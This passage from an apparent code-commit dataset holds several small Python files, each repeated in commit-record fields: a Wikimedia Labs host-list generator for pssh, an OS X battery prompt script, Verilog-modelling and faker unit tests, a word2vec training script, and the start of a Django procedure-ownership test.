projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
Add script to generate list of instances in any project
|
Add script to generate list of instances in any project
|
Python
|
cc0-1.0
|
yuvipanda/personal-wiki
|
Add script to generate list of instances in any project
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for runnign administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
<commit_before><commit_msg>Add script to generate list of instances in any project<commit_after>
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for runnign administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
Add script to generate list of instances in any project#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for runnign administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
<commit_before><commit_msg>Add script to generate list of instances in any project<commit_after>#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for runnign administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
projects_url = 'https://wikitech.wikimedia.org/w/api.php?action=query&list=novaprojects&format=json'
projects = json.loads(urlopen(projects_url).read().decode('utf-8'))['query']['novaprojects']
else:
projects = [project_spec]
instances = []
for project_name in projects:
api_url = 'https://wikitech.wikimedia.org/w/api.php' \
'?action=query&list=novainstances&niregion=eqiad&format=json' \
'&niproject=%s' % project_name
data = json.loads(urlopen(api_url).read().decode('utf-8'))
for instance in data['query']['novainstances']:
instances.append(instance['name'] + ".eqiad.wmflabs")
with open(project_spec, 'w') as f:
f.write("\n".join(instances))
|
|
727b17fd49c37c1b48629944c09e3546eb33774c
|
bin/osx_battery.py
|
bin/osx_battery.py
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
Add Steve Losh's script to display battery status on OS X
|
Add Steve Losh's script to display battery status on OS X
|
Python
|
apache-2.0
|
unixorn/jpb.zshplugin,unixorn/jpb.zshplugin,unixorn/jpb.zshplugin,unixorn/jpb.zshplugin
|
Add Steve Losh's script to display battery status on OS X
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
<commit_before><commit_msg>Add Steve Losh's script to display battery status on OS X<commit_after>
|
#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
Add Steve Losh's script to display battery status on OS X#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
<commit_before><commit_msg>Add Steve Losh's script to display battery status on OS X<commit_after>#!/usr/bin/env python
# coding=UTF-8
#
# http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
import math, subprocess
p = subprocess.Popen(["ioreg", "-rc", "AppleSmartBattery"], stdout=subprocess.PIPE)
output = p.communicate()[0]
o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
|
f1d5580eac25260236d115edc2bc8dab649b46e0
|
xc7/fasm2bels/tests/test_verilog_modeling.py
|
xc7/fasm2bels/tests/test_verilog_modeling.py
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
Add test for new connection modelling objects.
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>
|
Python
|
isc
|
SymbiFlow/symbiflow-arch-defs,SymbiFlow/symbiflow-arch-defs
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
<commit_before><commit_msg>Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com><commit_after>
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
<commit_before><commit_msg>Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com><commit_after>import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
|
4fd92cba5dce2241663a36ddb765bb2052715921
|
yunity/tests/unit/test__utils_tests__fake.py
|
yunity/tests/unit/test__utils_tests__fake.py
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
Add test for fake data generation
|
Add test for fake data generation
|
Python
|
agpl-3.0
|
yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/yunity-core,yunity/foodsaving-backend,yunity/yunity-core
|
Add test for fake data generation
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
<commit_before><commit_msg>Add test for fake data generation<commit_after>
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
Add test for fake data generationfrom yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
<commit_before><commit_msg>Add test for fake data generation<commit_after>from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
|
186aef390cd3c35c4b5f450951cd7001fa63d5ff
|
train_word2vec.py
|
train_word2vec.py
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
Add script to train a word2vec model
|
Add script to train a word2vec model
|
Python
|
apache-2.0
|
nlesc-sherlock/concept-search,nlesc-sherlock/concept-search,nlesc-sherlock/concept-search,nlesc-sherlock/concept-search
|
Add script to train a word2vec model
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
<commit_before><commit_msg>Add script to train a word2vec model<commit_after>
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
Add script to train a word2vec modelfrom __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
<commit_before><commit_msg>Add script to train a word2vec model<commit_after>from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
|
8c095383bf7b64112b86d32ebf8feb448416a6c7
|
src-backend/api/tests/test_procedures.py
|
src-backend/api/tests/test_procedures.py
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
Add test for ensuring procedures have the correct owner
|
Add test for ensuring procedures have the correct owner
|
Python
|
bsd-3-clause
|
SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder
|
Add test for ensuring procedures have the correct owner
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
<commit_before><commit_msg>Add test for ensuring procedures have the correct owner<commit_after>
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
Add test for ensuring procedures have the correct ownerfrom django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
